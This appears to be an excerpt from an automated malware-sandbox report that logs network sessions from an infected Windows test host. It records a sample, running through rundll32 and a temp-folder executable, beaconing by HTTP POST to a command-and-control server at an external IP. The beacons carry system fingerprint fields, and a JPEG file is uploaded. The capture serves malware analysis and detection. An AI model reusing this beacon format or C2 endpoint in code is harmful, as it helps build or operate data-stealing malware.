                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x 
?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. 
JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:45.025192976 CEST6481OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:45.025248051 CEST6484OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 22:59:45.025820971 CEST6486OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 22:59:45.025939941 CEST6489OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 22:59:45.026151896 CEST6492OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 22:59:45.026321888 CEST6494OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 22:59:45.026340961 CEST6497OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 22:59:45.026511908 CEST6500OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 22:59:45.026787996 CEST6503OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:45.027004957 CEST6505OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
216 | 176.111.174.114 | 80 | 192.168.2.4 | 49874 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:45.005768061 CEST | 6478 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:44 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
217 | 192.168.2.4 | 49876 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:45.219613075 CEST | 6665 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
218 | 176.111.174.114 | 80 | 192.168.2.4 | 49876 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:45.318110943 CEST | 6693 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:45 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
219 | 176.111.174.114 | 80 | 192.168.2.4 | 49875 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:45.410231113 CEST | 6694 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:45 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.4 | 49759 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:12.749295950 CEST | 4532 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
220 | 192.168.2.4 | 49877 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:45.539273024 CEST | 6695 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
221 | 176.111.174.114 | 80 | 192.168.2.4 | 49877 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:45.642859936 CEST | 6696 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:45 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
222 | 192.168.2.4 | 49879 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:45.848769903 CEST | 6696 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
223 | 176.111.174.114 | 80 | 192.168.2.4 | 49879 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:45.952708006 CEST | 6697 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:45 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
224 | 192.168.2.4 | 49880 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:46.161587000 CEST | 6697 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
225 | 176.111.174.114 | 80 | 192.168.2.4 | 49880 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:46.265474081 CEST | 6698 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:46 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          226 | 192.168.2.4 | 49881 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:46.476012945 CEST | 6698 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          227 | 176.111.174.114 | 80 | 192.168.2.4 | 49881 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:46.580061913 CEST | 6699 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:46 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          228 | 192.168.2.4 | 49882 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:46.795537949 CEST | 6699 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          229 | 176.111.174.114 | 80 | 192.168.2.4 | 49882 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:46.897949934 CEST | 6700 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:46 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          23 | 176.111.174.114 | 80 | 192.168.2.4 | 49759 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:12.852711916 CEST | 4532 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          230 | 192.168.2.4 | 49884 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
